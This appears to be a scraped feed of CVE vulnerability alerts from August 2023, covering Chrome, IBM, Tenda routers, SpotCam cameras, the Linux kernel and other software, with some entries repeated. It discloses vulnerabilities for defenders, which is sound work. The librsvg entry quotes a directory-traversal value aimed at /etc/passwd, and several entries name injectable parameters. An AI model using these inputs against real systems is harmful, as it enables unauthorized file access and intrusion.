🚨 CVE-2023-23473IBM InfoSphere Information Server 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 245400.🎖@cveNotify |
|
| 2023-08-28 10:58:19 |
🚨 CVE-2023-24959IBM InfoSphere Information Systems 11.7 could expose information about the host system and environment configuration. IBM X-Force ID: 246332.🎖@cveNotify |
|
| 2023-08-28 10:58:15 |
🚨 CVE-2023-26270IBM Security Guardium Data Encryption (IBM Guardium Cloud Key Manager (GCKM) 1.10.3)) could allow a remote attacker to execute arbitrary code on the system, caused by an angular template injection flaw. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 248119.🎖@cveNotify |
|
| 2023-08-28 10:58:14 |
🚨 CVE-2023-26271IBM Security Guardium Data Encryption (IBM Guardium Cloud Key Manager (GCKM) 1.10.3)) uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 248126.🎖@cveNotify |
|
| 2023-08-28 10:58:13 |
🚨 CVE-2023-26272IBM Security Guardium Data Encryption (IBM Guardium Cloud Key Manager (GCKM) 1.10.3)) could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 248133.🎖@cveNotify |
|
| 2023-08-28 10:58:12 |
🚨 CVE-2023-4561Cross-site Scripting (XSS) - Stored in GitHub repository omeka/omeka-s prior to 4.0.4.🎖@cveNotify |
|
| 2023-08-28 05:58:44 |
🚨 CVE-2016-15035A vulnerability was found in Doc2k RE-Chat 1.0. It has been classified as problematic. This affects an unknown part of the file js_on_radio-emergency.de_/re_chat.js. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named bd17d497ddd3bab4ef9c6831c747c37cc016c570. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-238155.🎖@cveNotify |
|
| 2023-08-28 05:58:43 |
🚨 CVE-2023-38024SpotCam Co., Ltd. SpotCam FHD 2’s hidden Telnet function has a vulnerability of using hard-coded Telnet credentials. An remote unauthenticated attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.🎖@cveNotify |
|
| 2023-08-28 05:58:41 |
🚨 CVE-2023-38025SpotCam Co., Ltd. SpotCam FHD 2’s hidden Telnet function has a vulnerability of OS command injection. An remote unauthenticated attacker can exploit this vulnerability to execute command injection attack to arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2023-08-28 05:58:40 |
🚨 CVE-2023-38026SpotCam Co., Ltd. SpotCam FHD 2 has a vulnerability of using hard-coded uBoot credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.🎖@cveNotify |
|
| 2023-08-28 05:58:39 |
🚨 CVE-2023-38027SpotCam Co., Ltd. SpotCam Sense’s hidden Telnet function has a vulnerability of OS command injection. An remote unauthenticated attacker can exploit this vulnerability to execute command injection attack to perform arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2023-08-28 05:58:38 |
🚨 CVE-2023-20197A vulnerability in the filesystem image parser for Hierarchical File System Plus (HFS+) of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for completion when a file is decompressed, which may result in a loop condition that could cause the affected software to stop responding. An attacker could exploit this vulnerability by submitting a crafted HFS+ filesystem image to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to stop responding, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog .🎖@cveNotify |
|
| 2023-08-28 05:58:37 |
🚨 CVE-2023-22877IBM InfoSphere Information Server 11.7 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 244368.🎖@cveNotify |
|
| 2023-08-28 05:58:33 |
🚨 CVE-2023-23473IBM InfoSphere Information Server 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 245400.🎖@cveNotify |
|
| 2023-08-28 05:58:32 |
🚨 CVE-2023-24959IBM InfoSphere Information Systems 11.7 could expose information about the host system and environment configuration. IBM X-Force ID: 246332.🎖@cveNotify |
|
| 2023-08-28 05:58:31 |
🚨 CVE-2023-26270IBM Security Guardium Data Encryption (IBM Guardium Cloud Key Manager (GCKM) 1.10.3)) could allow a remote attacker to execute arbitrary code on the system, caused by an angular template injection flaw. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 248119.🎖@cveNotify |
|
| 2023-08-28 05:58:30 |
🚨 CVE-2023-26271IBM Security Guardium Data Encryption (IBM Guardium Cloud Key Manager (GCKM) 1.10.3)) uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 248126.🎖@cveNotify |
|
| 2023-08-28 05:58:29 |
🚨 CVE-2023-26272IBM Security Guardium Data Encryption (IBM Guardium Cloud Key Manager (GCKM) 1.10.3)) could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 248133.🎖@cveNotify |
|
| 2023-08-28 05:58:25 |
🚨 CVE-2023-4560Improper Authorization of Index Containing Sensitive Information in GitHub repository omeka/omeka-s prior to 4.0.4.🎖@cveNotify |
|
| 2023-08-28 05:58:24 |
🚨 CVE-2023-4561Cross-site Scripting (XSS) - Stored in GitHub repository omeka/omeka-s prior to 4.0.4.🎖@cveNotify |
|
| 2023-08-28 05:58:23 |
🚨 CVE-2023-3330Improper Limitation of a Pathname to a Restricted Directory vulnerability in NEC Corporation Aterm WG2600HP2, WG2600HP, WG2200HP, WG1800HP2, WG1800HP, WG1400HP, WG600HP, WG300HP, WF300HP, WR9500N, WR9300N, WR8750N, WR8700N, WR8600N, WR8370N, WR8175N and WR8170N all versions allows a attacker to obtain specific files in the product.🎖@cveNotify |
|
| 2023-08-28 05:58:22 |
🚨 CVE-2023-38633A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by href=".?../../../../../../../../../../etc/passwd" in an xi:include element.🎖@cveNotify |
|
| 2023-08-28 01:01:35 |
🚨 CVE-2023-4556A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. Affected by this issue is the function mysqli_query of the file sexit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-238154 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-28 01:01:34 |
🚨 CVE-2023-4349Use after free in Device Trust Connectors in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-28 01:01:30 |
🚨 CVE-2023-4350Inappropriate implementation in Fullscreen in Google Chrome on Android prior to 116.0.5845.96 allowed a remote attacker to potentially spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-28 01:01:29 |
🚨 CVE-2023-4352Type confusion in V8 in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-28 01:01:28 |
🚨 CVE-2023-4354Heap buffer overflow in Skia in Google Chrome prior to 116.0.5845.96 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-28 01:01:25 |
🚨 CVE-2023-4355Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-28 01:01:24 |
🚨 CVE-2023-4357Insufficient validation of untrusted input in XML in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-28 01:01:23 |
🚨 CVE-2023-4359Inappropriate implementation in App Launcher in Google Chrome on iOS prior to 116.0.5845.96 allowed a remote attacker to potentially spoof elements of the security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-28 01:01:20 |
🚨 CVE-2023-4360Inappropriate implementation in Color in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-28 01:01:19 |
🚨 CVE-2023-4362Heap buffer overflow in Mojom IDL in Google Chrome prior to 116.0.5845.96 allowed a remote attacker who had compromised the renderer process and gained control of a WebUI process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-28 01:01:18 |
🚨 CVE-2023-4364Inappropriate implementation in Permission Prompts in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-26 19:58:55 |
🚨 CVE-2023-4427Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-26 19:58:54 |
🚨 CVE-2023-4429Use after free in Loader in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-26 19:58:53 |
🚨 CVE-2023-4431Out of bounds memory access in Fonts in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-26 12:58:12 |
🚨 CVE-2023-4548A vulnerability classified as critical has been found in SPA-Cart eCommerce CMS 1.9.0.3. This affects an unknown part of the file /search of the component GET Parameter Handler. The manipulation of the argument filter[brandid] leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-238059.🎖@cveNotify |
|
| 2023-08-26 10:58:23 |
🚨 CVE-2023-4546A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230816. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation leads to improper access controls. The exploit has been disclosed to the public and may be used. The identifier VDB-238057 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-26 10:58:22 |
🚨 CVE-2023-4545A vulnerability was found in IBOS OA 4.5.5. It has been classified as critical. Affected is an unknown function of the file ?r=recruit/bgchecks/export&checkids=x. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238056. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-26 10:58:21 |
🚨 CVE-2023-4544A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230809. It has been rated as problematic. This issue affects some unknown processing of the file /config/php.ini. The manipulation leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-26 05:58:34 |
🚨 CVE-2023-34723An issue was discovered in TechView LA-5570 Wireless Gateway 1.0.19_T53, allows attackers to gain sensitive information via /config/system.conf.🎖@cveNotify |
|
| 2023-08-26 05:58:33 |
🚨 CVE-2023-39287A vulnerability in the Edge Gateway component of Mitel MiVoice Connect through 19.3 SP3 (22.24.5800.0) could allow an authenticated attacker with elevated privileges and internal network access to conduct a command argument injection due to insufficient parameter sanitization. A successful exploit could allow an attacker to access network information and to generate excessive network traffic.🎖@cveNotify |
|
| 2023-08-26 05:58:30 |
🚨 CVE-2023-39288A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an authenticated attacker with elevated privileges and internal network access to conduct a command argument injection due to insufficient parameter sanitization. A successful exploit could allow an attacker to access network information and to generate excessive network traffic.🎖@cveNotify |
|
| 2023-08-26 05:58:29 |
🚨 CVE-2023-39290A vulnerability in the Edge Gateway component of Mitel MiVoice Connect through R19.3 SP3 (22.24.5800.0) could allow an authenticated attacker with elevated privileges to conduct an information disclosure attack due to improper configuration. A successful exploit could allow an attacker to view system information.🎖@cveNotify |
|
| 2023-08-26 05:58:28 |
🚨 CVE-2023-41121Array AG OS before 9.4.0.499 allows denial of service: remote attackers can cause system service processes to crash through abnormal HTTP operations.🎖@cveNotify |
|
| 2023-08-26 05:58:24 |
🚨 CVE-2023-4542A vulnerability was found in D-Link DAR-8000-10 up to 20230809. It has been classified as critical. This affects an unknown part of the file /app/sys1.php. The manipulation of the argument cmd with the input id leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238047. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-26 05:58:23 |
🚨 CVE-2021-27932Stormshield Network Security (SNS) VPN SSL Client 2.1.0 through 2.8.0 has Insecure Permissions.🎖@cveNotify |
|
| 2023-08-26 05:58:22 |
🚨 CVE-2023-24621An issue was discovered in Esoteric YamlBeans through 1.15. It allows untrusted deserialisation to Java classes by default, where the data and class are controlled by the author of the YAML document being processed.🎖@cveNotify |
|
| 2023-08-26 05:58:18 |
🚨 CVE-2023-36198Buffer Overflow vulnerability in skalenetwork sgxwallet v.1.9.0 allows an attacker to cause a denial of service via the trustedBlsSignMessage function.🎖@cveNotify |
|
| 2023-08-26 05:58:17 |
🚨 CVE-2023-39600IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.🎖@cveNotify |
|
| 2023-08-26 05:58:16 |
🚨 CVE-2023-39707A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add Expense parameter under the Expense section.🎖@cveNotify |
|
| 2023-08-25 23:58:35 |
🚨 CVE-2023-40585ironic-image is a container image to run OpenStack Ironic as part of Metal³. Prior to version capm3-v1.4.3, if Ironic is not deployed with TLS and it does not have API and Conductor split into separate services, access to the API is not protected by any authentication. Ironic API is also listening in host network. In case the node is not behind a firewall, the API could be accessed by anyone via network without authentication. By default, Ironic API in Metal3 is protected by TLS and basic authentication, so this vulnerability requires operator to configure API without TLS for it to be vulnerable. TLS and authentication however should not be coupled as they are in versions prior to capm3-v1.4.3. A patch exists in versions capm3-v1.4.3 and newer. Some workarounds are available. Either configure TLS for Ironic API (`deploy.sh -t ...`, `IRONIC_TLS_SETUP=true`) or split Ironic API and Conductor via configuration change (old implementation, not recommended). With both workarounds, services are configured with httpd front-end, which has proper authentication configuration in place.🎖@cveNotify |
|
| 2023-08-25 23:58:34 |
🚨 CVE-2023-40587Pyramid is an open source Python web framework. A path traversal vulnerability in Pyramid versions 2.0.0 and 2.0.1 impacts users of Python 3.11 that are using a Pyramid static view with a full filesystem path and have a `index.html` file that is located exactly one directory above the location of the static view's file system path. No further path traversal exists, and the only file that could be disclosed accidentally is `index.html`. Pyramid version 2.0.2 rejects any path that contains a null-byte out of caution. While valid in directory/file names, we would strongly consider it a mistake to use null-bytes in naming files/directories. Secondly, Python 3.11, and 3.12 has fixed the underlying issue in `os.path.normpath` to no longer truncate on the first `0x00` found, returning the behavior to pre-3.11 Python, un an as of yet unreleased version. Fixes will be available in:Python 3.12.0rc2 and 3.11.5. Some workarounds are available. Use a version of Python 3 that is not affected, downgrade to Python 3.10 series temporarily, or wait until Python 3.11.5 is released and upgrade to the latest version of Python 3.11 series.🎖@cveNotify |
|
| 2023-08-25 23:58:33 |
🚨 CVE-2023-41080URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.The vulnerability is limited to the ROOT (default) web application.🎖@cveNotify |
|
| 2023-08-25 23:58:30 |
🚨 CVE-2023-39908The PKCS11 module of the YubiHSM 2 SDK through 2023.01 does not properly validate the length of specific read operations on object metadata. This may lead to disclosure of uninitialized and previously used memory.🎖@cveNotify |
|
| 2023-08-25 23:58:29 |
🚨 CVE-2020-18651Buffer Overflow vulnerability in function ID3_Support::ID3v2Frame::getFrameValue in exempi 2.5.0 and earlier allows remote attackers to cause a denial of service via opening of crafted audio file with ID3V2 frame.🎖@cveNotify |
|
| 2023-08-25 23:58:28 |
🚨 CVE-2020-18652Buffer Overflow vulnerability in WEBP_Support.cpp in exempi 2.5.0 and earlier allows remote attackers to cause a denial of service via opening of crafted webp file.🎖@cveNotify |
|
| 2023-08-25 23:58:24 |
🚨 CVE-2020-18770An issue was discovered in function zzip_disk_entry_to_file_header in mmapped.c in zziplib 0.13.69, which will lead to a denial-of-service.🎖@cveNotify |
|
| 2023-08-25 23:58:23 |
🚨 CVE-2022-48547A reflected cross-site scripting (XSS) vulnerability in Cacti 0.8.7g and earlier allows unauthenticated remote attackers to inject arbitrary web script or HTML in the "ref" parameter at auth_changepassword.php.🎖@cveNotify |
|
| 2023-08-25 23:58:18 |
🚨 CVE-2020-18781Heap buffer overflow vulnerability in FilePOSIX::read in File.cpp in audiofile 0.3.6 may cause denial-of-service via a crafted wav file, this bug can be triggered by the executable sfconvert.🎖@cveNotify |
|
| 2023-08-25 23:58:17 |
🚨 CVE-2020-18382Heap-buffer-overflow in /src/wasm/wasm-binary.cpp in wasm::WasmBinaryBuilder::visitBlock(wasm::Block*) in Binaryen 1.38.26. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm-opt.🎖@cveNotify |
|
| 2023-08-25 20:58:42 |
🚨 CVE-2022-29654Buffer overflow vulnerability in quote_for_pmake in asm/nasm.c in nasm before 2.15.05 allows attackers to cause a denial of service via crafted file.🎖@cveNotify |
|
| 2023-08-25 20:58:41 |
🚨 CVE-2021-40266FreeImage before 1.18.0, ReadPalette function in PluginTIFF.cpp is vulnerabile to null pointer dereference.🎖@cveNotify |
|
| 2023-08-25 20:58:39 |
🚨 CVE-2020-25887Buffer overflow in mg_resolve_from_hosts_file in Mongoose 6.18, when reading from a crafted hosts file.🎖@cveNotify |
|
| 2023-08-25 20:58:38 |
🚨 CVE-2020-23804Uncontrolled Recursion in pdfinfo, and pdftops in poppler 0.89.0 allows remote attackers to cause a denial of service via crafted input.🎖@cveNotify |
|
| 2023-08-25 20:58:37 |
🚨 CVE-2020-22628Buffer Overflow vulnerability in LibRaw::stretch() function in libraw\src\postprocessing\aspect_ratio.cpp.🎖@cveNotify |
|
| 2023-08-25 20:58:36 |
🚨 CVE-2020-22570Memcached 1.6.0 before 1.6.3 allows remote attackers to cause a denial of service (daemon crash) via a crafted meta command.🎖@cveNotify |
|
| 2023-08-25 20:58:34 |
🚨 CVE-2020-22219Buffer Overflow vulnerability in function bitwriter_grow_ in flac before 1.4.0 allows remote attackers to run arbitrary code via crafted input to the encoder.🎖@cveNotify |
|
| 2023-08-25 20:58:33 |
🚨 CVE-2020-21687Buffer Overflow vulnerability in scan function in stdscan.c in nasm 2.15rc0 allows remote attackers to cause a denial of service via crafted asm file.🎖@cveNotify |
|
| 2023-08-25 20:58:32 |
🚨 CVE-2023-20197A vulnerability in the filesystem image parser for Hierarchical File System Plus (HFS+) of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for completion when a file is decompressed, which may result in a loop condition that could cause the affected software to stop responding. An attacker could exploit this vulnerability by submitting a crafted HFS+ filesystem image to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to stop responding, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog .🎖@cveNotify |
|
| 2023-08-25 20:58:31 |
🚨 CVE-2023-20217A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, local attacker to elevate privileges on an affected device. This vulnerability is due to insufficient input validation by the operating system CLI. An attacker could exploit this vulnerability by issuing certain commands using sudo. A successful exploit could allow the attacker to view arbitrary files as root on the underlying operating system. The attacker must have valid credentials on the affected device.🎖@cveNotify |
|
| 2023-08-25 20:58:30 |
🚨 CVE-2023-20221A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of the web-based management interface of an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an authenticated user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform a factory reset of the affected device, resulting in a Denial of Service (DoS) condition.🎖@cveNotify |
|
| 2023-08-25 20:58:28 |
🚨 CVE-2023-4456A flaw was found in openshift-logging LokiStack. The key used for caching is just the token, which is too broad. This issue allows a user with a token valid for one action to execute other actions as long as the authorization allowing the original action is still cached.🎖@cveNotify |
|
| 2023-08-25 20:58:27 |
🚨 CVE-2020-21722Buffer Overflow vulnerability in oggvideotools 0.9.1 allows remote attackers to run arbitrary code via opening of crafted ogg file.🎖@cveNotify |
|
| 2023-08-25 20:58:26 |
🚨 CVE-2020-21723A Segmentation Fault issue discovered StreamSerializer::extractStreams function in streamSerializer.cpp in oggvideotools 0.9.1 allows remote attackers to cause a denial of service (crash) via opening of crafted ogg file.🎖@cveNotify |
|
| 2023-08-25 20:58:24 |
🚨 CVE-2020-21724Buffer Overflow vulnerability in ExtractorInformation function in streamExtractor.cpp in oggvideotools 0.9.1 allows remaote attackers to run arbitrary code via opening of crafted ogg file.🎖@cveNotify |
|
| 2023-08-25 20:58:23 |
🚨 CVE-2020-21896A Use After Free vulnerability in svg_dev_text_span_as_paths_defs function in source/fitz/svg-device.c in Artifex Software MuPDF 1.16.0 allows remote attackers to cause a denial of service via opening of a crafted PDF file.🎖@cveNotify |
|
| 2023-08-25 20:58:22 |
🚨 CVE-2023-40352McAfee Safe Connect before 2.16.1.126 may allow an adversary with system privileges to achieve privilege escalation by loading arbitrary DLLs.🎖@cveNotify |
|
| 2023-08-25 20:58:21 |
🚨 CVE-2020-27418A Use After Free vulnerability in Fedora Linux kernel 5.9.0-rc9 allows attackers to obatin sensitive information via vgacon_invert_region() function.🎖@cveNotify |
|
| 2023-08-25 20:58:20 |
🚨 CVE-2021-40262A stack exhaustion issue was discovered in FreeImage before 1.18.0 via the Validate function in PluginRAW.cpp.🎖@cveNotify |
|
| 2023-08-25 20:58:19 |
🚨 CVE-2020-21679Buffer Overflow vulnerability in WritePCXImage function in pcx.c in GraphicsMagick 1.4 allows remote attackers to cause a denial of service via converting of crafted image file to pcx format.🎖@cveNotify |
|
| 2023-08-25 18:58:42 |
🚨 CVE-2023-40798In Tenda AC23 v16.03.07.45_cn, the formSetIPv6status and formGetWanParameter functions do not authenticate user input parameters, resulting in a post-authentication stack overflow vulnerability.🎖@cveNotify |
|
| 2023-08-25 18:58:41 |
🚨 CVE-2023-38201A flaw was found in the Keylime registrar that could allow a bypass of the challenge-response protocol during agent registration. This issue may allow an attacker to impersonate an agent and hide the true status of a monitored machine if the fake agent is added to the verifier list by a legitimate user, resulting in a breach of the integrity of the registrar database.🎖@cveNotify |
|
| 2023-08-25 18:58:40 |
🚨 CVE-2023-40799Tenda AC23 Vv16.03.07.45_cn is vulnerable to Buffer Overflow via sub_450A4C function.🎖@cveNotify |
|
| 2023-08-25 18:58:39 |
🚨 CVE-2023-40800The compare_parentcontrol_time function does not authenticate user input parameters, resulting in a post-authentication stack overflow vulnerability in Tenda AC23 v16.03.07.45_cn.🎖@cveNotify |
|
| 2023-08-25 18:58:35 |
🚨 CVE-2023-40801The sub_451784 function does not validate the parameters entered by the user, resulting in a stack overflow vulnerability in Tenda AC23 v16.03.07.45_cn🎖@cveNotify |
|
| 2023-08-25 18:58:34 |
🚨 CVE-2023-40802The get_parentControl_list_Info function does not verify the parameters entered by the user, causing a post-authentication heap overflow vulnerability in Tenda AC23 v16.03.07.45_cn🎖@cveNotify |
|
| 2023-08-25 18:58:33 |
🚨 CVE-2023-40915Tenda AX3 v16.03.12.11 has a stack buffer overflow vulnerability detected at function form_fast_setting_wifi_set. This vulnerability allows attackers to cause a Denial of Service (DoS) via the ssid parameter.🎖@cveNotify |
|
| 2023-08-25 18:58:32 |
🚨 CVE-2023-4534A vulnerability, which was classified as problematic, was found in NeoMind Fusion Platform up to 20230731. Affected is an unknown function of the file /fusion/portal/action/Link. The manipulation of the argument link leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-238026 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-25 18:58:31 |
🚨 CVE-2020-22218An issue was discovered in function _libssh2_packet_add in libssh2 1.10.0 allows attackers to access out of bounds memory.🎖@cveNotify |
|
| 2023-08-25 18:58:27 |
🚨 CVE-2023-38906An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via the authentication code for the UDP message.🎖@cveNotify |
|
| 2023-08-25 18:58:26 |
🚨 CVE-2023-38909An issue in TPLink Smart bulb Tapo series L530 v.1.0.0 and Tapo Application v.2.8.14 allows a remote attacker to obtain sensitive information via the IV component in the AES128-CBC function.🎖@cveNotify |
|
| 2023-08-25 18:58:25 |
🚨 CVE-2023-40034Woodpecker is a community fork of the Drone CI system. In affected versions an attacker can post malformed webhook data witch lead to an update of the repository data that can e.g. allow the takeover of an repo. This is only critical if the CI is configured for public usage and connected to a forge witch is also in public usage. This issue has been addressed in version 1.0.2. Users are advised to upgrade. Users unable to upgrade should secure the CI system by making it inaccessible to untrusted entities, for example, by placing it behind a firewall.🎖@cveNotify |
|
| 2023-08-25 18:58:24 |
🚨 CVE-2020-22217Buffer overflow vulnerability in c-ares before 1_16_1 thru 1_17_0 via function ares_parse_soa_reply in ares_parse_soa_reply.c.🎖@cveNotify |
|
| 2023-08-25 18:58:20 |
🚨 CVE-2023-4435Improper Input Validation in GitHub repository hamza417/inure prior to build88.🎖@cveNotify |
|
| 2023-08-25 18:58:19 |
🚨 CVE-2020-21710A divide by zero issue discovered in eps_print_page in gdevepsn.c in Artifex Software GhostScript 9.50 allows remote attackers to cause a denial of service via opening of crafted PDF file.🎖@cveNotify |
|
| 2023-08-25 18:58:18 |
🚨 CVE-2020-18831Buffer Overflow vulnerability in tEXtToDataBuf function in pngimage.cpp in Exiv2 0.27.1 allows remote attackers to cause a denial of service and other unspecified impacts via use of crafted file.🎖@cveNotify |
|
| 2023-08-25 18:58:17 |
🚨 CVE-2023-3936The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-08-25 16:58:52 |
🚨 CVE-2023-2006A race condition was found in the Linux kernel's RxRPC network protocol, within the processing of RxRPC bundles. This issue results from the lack of proper locking when performing operations on an object. This may allow an attacker to escalate privileges and execute arbitrary code in the context of the kernel.🎖@cveNotify |
|
| 2023-08-25 16:58:50 |
🚨 CVE-2014-3534arch/s390/kernel/ptrace.c in the Linux kernel before 3.15.8 on the s390 platform does not properly restrict address-space control operations in PTRACE_POKEUSR_AREA requests, which allows local users to obtain read and write access to kernel memory locations, and consequently gain privileges, via a crafted application that makes a ptrace system call.🎖@cveNotify |
|
| 2023-08-25 16:58:49 |
🚨 CVE-2014-3153The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.🎖@cveNotify |
|
| 2023-08-25 16:58:48 |
🚨 CVE-2014-1737The raw_cmd_copyin function in drivers/block/floppy.c in the Linux kernel through 3.14.3 does not properly handle error conditions during processing of an FDRAWCMD ioctl call, which allows local users to trigger kfree operations and gain privileges by leveraging write access to a /dev/fd device.🎖@cveNotify |
|
| 2023-08-25 16:58:47 |
🚨 CVE-2022-4452Insufficient data validation in crosvm in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-25 16:58:43 |
🚨 CVE-2023-40799Tenda AC23 Vv16.03.07.45_cn AC23 is vulnerable to Buffer via sub_450A4C function.🎖@cveNotify |
|
| 2023-08-25 16:58:42 |
🚨 CVE-2023-40800The compare_parentcontrol_time function does not authenticate user input parameters, resulting in a post-authentication stack overflow vulnerability in Tenda AC23 v16.03.07.45_cn.🎖@cveNotify |
|
| 2023-08-25 16:58:41 |
🚨 CVE-2023-40801The sub_451784 function does not validate the parameters entered by the user, resulting in a stack overflow vulnerability in Tenda AC23 v16.03.07.45_cn🎖@cveNotify |
|
| 2023-08-25 16:58:40 |
🚨 CVE-2023-40802The get_parentControl_list_Info function does not verify the parameters entered by the user, causing a post-authentication heap overflow vulnerability in Tenda AC23 v16.03.07.45_cn🎖@cveNotify |
|
| 2023-08-25 16:58:39 |
🚨 CVE-2023-40915Tenda AX3 v16.03.12.11 has a stack buffer overflow vulnerability detected at function form_fast_setting_wifi_set. This vulnerability allows attackers to cause a Denial of Service (DoS) via the ssid parameter.🎖@cveNotify |
|
| 2023-08-25 16:58:38 |
